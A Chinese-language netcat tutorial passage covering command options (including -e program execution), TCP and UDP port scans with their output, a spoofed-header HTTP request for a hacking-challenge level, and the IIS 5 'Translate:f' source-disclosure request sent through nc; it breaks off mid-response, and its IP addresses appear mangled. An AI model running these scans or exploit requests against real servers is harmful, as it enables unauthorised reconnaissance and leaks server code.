网络nc程序详解及使用方法总结.docxVIP

一、基本使用想要连接到某处: nc [-options] hostname port[s] [ports] …绑定端口等待连接: nc -l -p port [-options] [hostname] [port]参数:-e prog 程序重定向，一旦连接，就执行 [危险!!]-g gateway source-routing hop point[s], up to 8-G num source-routing pointer: 4, 8, 12, …-h 帮助信息-i secs 延时的间隔-l 监听模式，用于入站连接-n 指定数字的IP地址，不能用hostname-o file 记录16进制的传输-p port 本地端口号-r 任意指定本地及远程端口-s addr 本地源地址-u UDP模式-v 详细输出——用两个-v可得到更详细的内容-w secs timeout的时间-z 将输入输出关掉——用于扫描时其中端口号可以指定一个或者用lo-hi式的指定范围。例如：扫描端口tcp扫描C:ncnc -v -z -w2 0 1-140net [0] 140 (?)net [0] 139 (netbios-ssn) opennet [0] 138 (?)net [0] 137 (netbios-ns)net [0] 136 (?)net [0] 135 (epmap) opennet [0] 81 (?) opennet [0] 80 (http) opennet [0] 79 (finger)net [0] 25 (smtp) opennet [0] 24 (?)net [0] 23 (telnet)net [0] 21 (ftp)udp扫描C:ncnc -u -v -z -w2 0 1-140net [0] 140 (?) opennet [0] 139 (?) opennet [0] 138 (netbios-dgm) opennet [0] 137 (netbios-ns) opennet [0] 54 (?) opennet [0] 53 (domain) opennet [0] 38 (?) opennet [0] 37 (time) opennet [0] 7 (echo) open二、高级应用1.IE的MIME欺骗这个网站目录提供了黑客的n关，过了这n关证明你开始入门了。我做的http://www.try2hack.nl的国产版。这个页面告诉我们的浏览器不是 IE6.72,我们的*作系统不是LIUNX,我们不是从/ms.htm重定向链接过去的，linux有 IE6.72? 微软会在它的页面上放http://www.try2hack.nl/cgi-bin/level7.pl的链接？nc 4 80GET /level/level7.php HTTP/1.1 enterAccept:image/gif,image/x-xbitmap,application/msword,*/* enterReferer:/ms.htm enterAccept-Language:zh-cn enterAccept-Encodeing:gzip,deflate enterUser-Agent:Mozilla/4.0 (compatible;MSIE6.72;Linux i686) enterHost:4 enterConnection:Keep-Alive enter2.IIS 5 “Translate:f” 显示代码脆弱点Translate:f脆弱点的机制：发送一个畸形的HTTP GET 请求给服务器方一个可执行脚本或相关文件类型（例如.ASP或者global.asa）。这些文件是用于服务器上运行的，绝不会到客户机上去，而这个请求就会导致IIS将这种文件的内容发送到远端的客户机上，而不是在服务器上运行。这种畸形的HTTP GET请求的关键特性是该请求的末尾有一个特定的头信息Translate:f，并有一个反斜杠””附于URL之后。下面就有这样的一个例子（[CRLF]代表回车字符）注意 GET global.asa 后的反斜杠以及Translate:f头信息。GET /global.asa HTTP/1.0Host:User-Agent:SensePostDataContent-Type:application/x-www-form-urlencodedTranslate:f[CRLF][CRLF]将以上内容保存在一个文本文件中（例如example.txt）然后向一个有这个漏洞的服务器发送c:type example.txt | nc –nvv 0 80(UNKNOWN) [0] 80 (?) openHTTP/1.1 200 OKServer